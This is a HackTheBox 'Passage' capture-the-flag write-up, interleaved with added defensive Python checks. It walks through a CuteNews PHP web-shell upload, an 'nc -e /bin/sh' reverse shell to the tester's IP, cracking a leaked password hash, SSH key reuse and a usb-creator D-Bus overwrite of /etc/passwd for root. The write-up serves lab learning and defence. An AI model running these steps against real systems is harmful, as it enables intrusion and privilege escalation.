HackTheBox - Passage write up
6 min read

Passage is a Medium Linux box.

Recon

As always, let's start with an nmap scan:

$ nmap -A -T4 -p -1024 -oN scan.nmap 10.10.10.206

PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open, 22 & 80. OpenSSH seems to be up to date, so let's check the other port.

Web

http://10.10.10.206/index.php

We can't use gobuster because of Fail2Ban. If we click on the orange RSS button, we can see that the web application uses CuteNews.

http://10.10.10.206/CuteNews/

At the bottom of the page we can see that the CuteNews version is 2.1.1. After some research we can find that this version is vulnerable to RCE (Remote Code Execution): the avatar upload of a user accepts PHP code instead of an image.

If we right-click on our avatar and choose "View Image", we can find where our PHP shell was uploaded.

http://passage.htb/CuteNews/uploads/avatar_toto_shell.php?cmd=id
GIF8;\nuid=33(www-data) gid=33(www-data) groups=33(www-data) 

http://passage.htb/CuteNews/uploads/avatar_toto_shell.php?cmd=which+nc
/bin/nc
http://passage.htb/CuteNews/uploads/avatar_toto_shell.php?cmd=nc+-e+/bin/sh+10.10.14.138+4444

xanhacks~ $ nc -lvnp 4444
Connection from 10.10.10.206:59980
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
www-data@passage:/var/www/html/CuteNews/uploads$ 

We get a reverse shell!
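From the defender's side, the avatar upload works because the check on the uploaded file is satisfied by a few bytes of GIF header in front of PHP code. The following is an added example, not code from the write-up or from CuteNews: a weak "does it start like an image?" check next to a hardened validator that requires an extension allow-list, a complete image signature that agrees with the extension, and no PHP open tag anywhere in the body. The function names, the signature table and the sample files are assumptions constructed for this demonstration.

```python
from __future__ import annotations
import os
import re

# Constructed allow-list and image signatures (assumptions for this example).
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
# Any PHP open tag anywhere in the file: <?php, <?= or a bare <?
PHP_TAG = re.compile(rb"<\?(?:php|=)?", re.IGNORECASE)


def naive_check(filename: str, data: bytes) -> bool:
    """Weak validation (hypothetical): only the first four bytes are compared,
    so 'GIF8;' followed by PHP source passes, whatever the file name is."""
    return data[:4] in (b"GIF8", b"\x89PNG")


def hardened_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Extension allow-list, full (not prefix) signature match, signature must
    agree with the extension, and no PHP open tag inside the body."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    detected = next((t for sig, t in MAGIC.items() if data.startswith(sig)), None)
    if detected is None:
        return False, "no complete image signature"
    if ext == ".jpeg":
        ext = ".jpg"
    if detected != ext:
        return False, "signature does not match extension"
    if PHP_TAG.search(data):
        return False, "PHP open tag inside image data"
    return True, "ok"


# Constructed samples: the first mimics the 'GIF8;' + PHP trick seen above.
SAMPLES = {
    "avatar_toto_shell.php": b"GIF8;<?php echo 'not an image'; ?>",
    "avatar.gif": b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00" * 16,
    "avatar.png": b"GIF89a" + b"\x00" * 8,  # real GIF bytes, wrong extension
}


def run_samples() -> dict[str, tuple[bool, bool]]:
    """(naive verdict, hardened verdict) for each constructed sample."""
    return {name: (naive_check(name, d), hardened_check(name, d)[0])
            for name, d in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdicts in run_samples().items():
        print(f"{name:24} naive={verdicts[0]!s:5} hardened={verdicts[1]}")
```

The tag scan is a heuristic; the control that actually stops this class of bug is storing uploads under a server-generated name in a directory where the web server does not execute scripts, so that even a file that slips through validation is served as static bytes.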

User #1

There are two users besides root.

nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
root:x:0:0:root:/root:/bin/bash

After enumerating the box, I found multiple PHP scripts with serialized classes. It took me a long time to find these files because their contents were base64-encoded, not strings like "password" or "username" that are easy to grep.

www-data@passage:/var/www/html/CuteNews/cdata$ ls users
09.php	1e.php	48.php	5d.php	78.php	b0.php	d4.php	f7.php
0a.php	21.php	4b.php	66.php	7a.php	b7.php	d5.php	fc.php
0c.php	32.php	50.php	6e.php	8f.php	c8.php	d6.php	lines
16.php	3d.php	52.php	77.php	97.php	d1.php	dd.php	users.txt
www-data@passage:/var/www/html/CuteNews/cdata$ cat users/b0.php
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1...
base64decode(YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1...) =
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
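The user files above are a PHP "die" guard line followed by the base64 of PHP serialize() output. As an added example (not from the write-up or from CuteNews), here is a small parser for that format together with an audit pass that flags accounts whose stored password is a bare 64-hex-character digest, the unsalted SHA-256 shape that lookup services such as CrackStation resolve instantly. The sample file is constructed by re-encoding the decoded record shown above; the function names are assumptions.

```python
from __future__ import annotations
import base64
import re


def php_unserialize(data: bytes):
    """Minimal parser for the PHP serialize() subset CuteNews uses:
    arrays (a), strings (s), integers (i), booleans (b) and null (N).
    Works on bytes because PHP string lengths are byte counts."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos:pos + 1]
        if t == b"N":                      # 'N;'
            pos += 2
            return None
        if t in (b"i", b"b"):              # 'i:123;'  'b:1;'
            end = data.index(b";", pos)
            val = int(data[pos + 2:end])
            pos = end + 1
            return bool(val) if t == b"b" else val
        if t == b"s":                      # 's:<len>:"<bytes>";'
            colon = data.index(b":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2              # skip ':"'
            val = data[start:start + length].decode("utf-8", "replace")
            pos = start + length + 2       # skip '";'
            return val
        if t == b"a":                      # 'a:<count>:{<key><value>...}'
            colon = data.index(b":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2                # skip ':{'
            out = {}
            for _ in range(count):
                key = parse()
                out[key] = parse()
            pos += 1                       # skip '}'
            return out
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    return parse()


def load_cdata_user(file_text: str) -> dict:
    """Drop the '<?php die(...) ?>' guard line and decode the base64 payload."""
    payload = "".join(ln for ln in file_text.splitlines() if not ln.startswith("<?php"))
    return php_unserialize(base64.b64decode(payload))


def audit_password_hashes(record: dict) -> list[tuple[str, str]]:
    """Flag accounts whose 'pass' field looks like an unsalted SHA-256 digest."""
    findings = []
    for username, fields in record.get("name", {}).items():
        if re.fullmatch(r"[0-9a-f]{64}", fields.get("pass", "")):
            findings.append((username, "64 hex chars: unsalted SHA-256, resolvable by lookup tables"))
    return findings


# Constructed sample: the record decoded above, re-encoded the way cdata stores it.
SAMPLE_SERIALIZED = (
    b'a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";'
    b's:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";'
    b's:4:"nick";s:10:"Paul Coles";s:4:"pass";'
    b's:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";'
    b's:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}'
)
SAMPLE_FILE = ("<?php die('Direct call - access denied'); ?>\n"
               + base64.b64encode(SAMPLE_SERIALIZED).decode() + "\n")

if __name__ == "__main__":
    rec = load_cdata_user(SAMPLE_FILE)
    for user, why in audit_password_hashes(rec):
        print(f"{user}: {why}")
```

Running the audit over every file in cdata/users gives a quick inventory of which accounts would fall to a rainbow-table lookup; the remedy is a salted, slow password hash (bcrypt or Argon2) and a forced reset of any account still carrying the old digest.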

We have the hash of the paul user. It is a SHA-256 hash, so let's crack it with CrackStation!

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/cdata/users$ cd
paul@passage:~$ cat user.txt
5c483e5b9501435f0e59ea39d...

I found the hash for the nadav user too but I cannot crack it.

User #2

Paul has an SSH private key that connects to the user nadav. Easy :)

paul@passage:~$ ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
paul@passage:~$ ls -alR
...

./.ssh:
total 24
drwxr-xr-x  2 paul paul 4096 Jul 21 10:43 .
drwxr-x--- 17 paul paul 4096 Dec 28 06:32 ..
-rw-r--r--  1 paul paul  395 Jul 21 10:43 authorized_keys
-rw-------  1 paul paul 1679 Jul 21 10:43 id_rsa
-rw-r--r--  1 paul paul  395 Jul 21 10:43 id_rsa.pub
-rw-r--r--  1 paul paul 1312 Jul 21 10:44 known_hosts

...
paul@passage:~$ cat .ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
paul@passage:~$ ssh -i .ssh/id_rsa nadav@localhost
Last login: Mon Dec 28 08:18:26 2020 from 10.10.14.195
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

Root

After looking at the process list, we can find this python script running as root.

nadav@passage:~$ ps -aux
...
root       2559  0.2  0.4 159044 18460 ?        Sl   13:05   0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

The script imports the dbus module. We can introspect the bus with the busctl command.

nadav@passage:/dev/shm$ busctl list
NAME   PID PROCESS  USER  CONNECTION UNIT  SESSION    DESCRIPTION       
...
com.ubuntu.USBCreator  2559 usb-creator-hel root :1.67 dbus.service     ...     
nadav@passage:/dev/shm$ busctl tree com.ubuntu.USBCreator
└─/com
  └─/com/ubuntu
    └─/com/ubuntu/USBCreator

The bus permissions are defined in /etc/dbus-1/system.d/. Here, any user can send messages to the com.ubuntu.USBCreator interface.

nadav@passage:/etc/dbus-1/system.d$ cat com.ubuntu.USBCreator.conf 
<!DOCTYPE busconfig PUBLIC
 "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
  </policy>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="com.ubuntu.USBCreator"/>
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="org.freedesktop.DBus.Introspectable"/>
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="org.freedesktop.DBus.Properties"/>
  </policy>

</busconfig>
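The comment in that policy file says method calls are "further constrained by PolicyKit privileges", which is exactly the assumption a reviewer has to verify for every root-owned service that the default context may reach. As an added example (not from the write-up, from usb-creator or from D-Bus itself), this script parses a system.d policy file and lists the services that any local user may call on their own interface, so each one can be checked for a polkit authorization step in the service code. The sample policy is the file shown above with its DOCTYPE line omitted; the function names are assumptions.

```python
from __future__ import annotations
import xml.etree.ElementTree as ET

# Constructed sample: the policy file shown above, DOCTYPE omitted for brevity.
SAMPLE_POLICY = """<busconfig>

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
  </policy>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="com.ubuntu.USBCreator"/>
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="org.freedesktop.DBus.Introspectable"/>
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="org.freedesktop.DBus.Properties"/>
  </policy>

</busconfig>
"""

# Interfaces every D-Bus object exposes; reaching them is not a finding by itself.
STANDARD_INTERFACES = {
    "org.freedesktop.DBus.Introspectable",
    "org.freedesktop.DBus.Properties",
    "org.freedesktop.DBus.Peer",
}


def open_send_rules(policy_xml: str) -> list[dict]:
    """Every <allow send_destination=...> under <policy context="default">,
    annotated with which user(s) the policy lets own that service name."""
    root = ET.fromstring(policy_xml)
    owners: dict[str, set[str]] = {}
    for pol in root.findall("policy"):
        for allow in pol.findall("allow"):
            if "own" in allow.attrib:
                owners.setdefault(allow.attrib["own"], set()).add(pol.get("user", "*"))
    rules = []
    for pol in root.findall("policy"):
        if pol.get("context") != "default":
            continue
        for allow in pol.findall("allow"):
            dest = allow.get("send_destination")
            if dest is None:
                continue
            rules.append({
                "destination": dest,
                "interface": allow.get("send_interface", "*"),
                "owner": ",".join(sorted(owners.get(dest, {"?"}))),
            })
    return rules


def privileged_open_services(policy_xml: str) -> list[str]:
    """Root-owned services whose own (non-standard) interface is callable by
    any bus client; each needs a polkit check inside the service itself."""
    return sorted({r["destination"] for r in open_send_rules(policy_xml)
                   if r["owner"] == "root" and r["interface"] not in STANDARD_INTERFACES})


if __name__ == "__main__":
    for rule in open_send_rules(SAMPLE_POLICY):
        print(f'{rule["destination"]} ({rule["owner"]}) <- {rule["interface"]}')
    print("verify polkit enforcement in:", privileged_open_services(SAMPLE_POLICY))
```

Pointed at a whole /etc/dbus-1/system.d/ directory this produces the list of privileged services whose method handlers deserve a code review; on this box that list contains com.ubuntu.USBCreator, and the article the author cites below is the result of exactly that review.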

After searching around I found this article. It explains that we can overwrite arbitrary files on the filesystem as root, with no password prompt, through the Image method of the python script (usb-creator-helper).

So I copy the current /etc/passwd file and add my own toto user with root privileges to it.

$ openssl passwd -1
Password: toto
Verifying - Password: toto
$1$AHYnLVT/$g.9WyZTowb/RwZB3KuJWx0

nadav@passage:/dev/shm$ cp /etc/passwd passwd
nadav@passage:/dev/shm$ vim passwd # add toto
nadav@passage:/dev/shm$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image $PWD/passwd /etc/passwd true
()
nadav@passage:/dev/shm$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
toto:$1$AHYnLVT/$g.9WyZTowb/RwZB3KuJWx0:0:0:toto:/:/bin/bash
...
nadav@passage:/dev/shm$ su toto
Password: toto
root@passage:/dev/shm# cat /root/root.txt 
4b5259ca9f44d838b848f896...
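The last step leaves two loud traces in /etc/passwd: a second UID 0 account, and a password hash stored in the passwd file itself rather than in /etc/shadow. As an added example (not part of the write-up), the following check reads passwd-format lines and reports both conditions, plus empty password fields and malformed entries. The sample lines are constructed from the entries shown above; the function name is an assumption.

```python
from __future__ import annotations

# Constructed sample: the entries shown above plus one ordinary system account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
toto:$1$AHYnLVT/$g.9WyZTowb/RwZB3KuJWx0:0:0:toto:/:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
"""

# Values that mean "look in /etc/shadow" or "no login via password".
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> list[tuple[str, str]]:
    """Return (account, finding) pairs for suspicious /etc/passwd entries."""
    findings: list[tuple[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if pw == "":
            findings.append((name, "empty password field: login without a password"))
        elif pw not in SHADOWED:
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account other than root"))
    return findings


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for account, why in audit_passwd(source):
        print(f"{account}: {why}")
```

Run against the live file it takes a path argument (`python3 audit_passwd.py /etc/passwd`). A file-integrity tool or an auditd watch on /etc/passwd catches the same change at write time, which matters here because the write happens through a root-owned D-Bus service rather than through any command the user runs directly.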
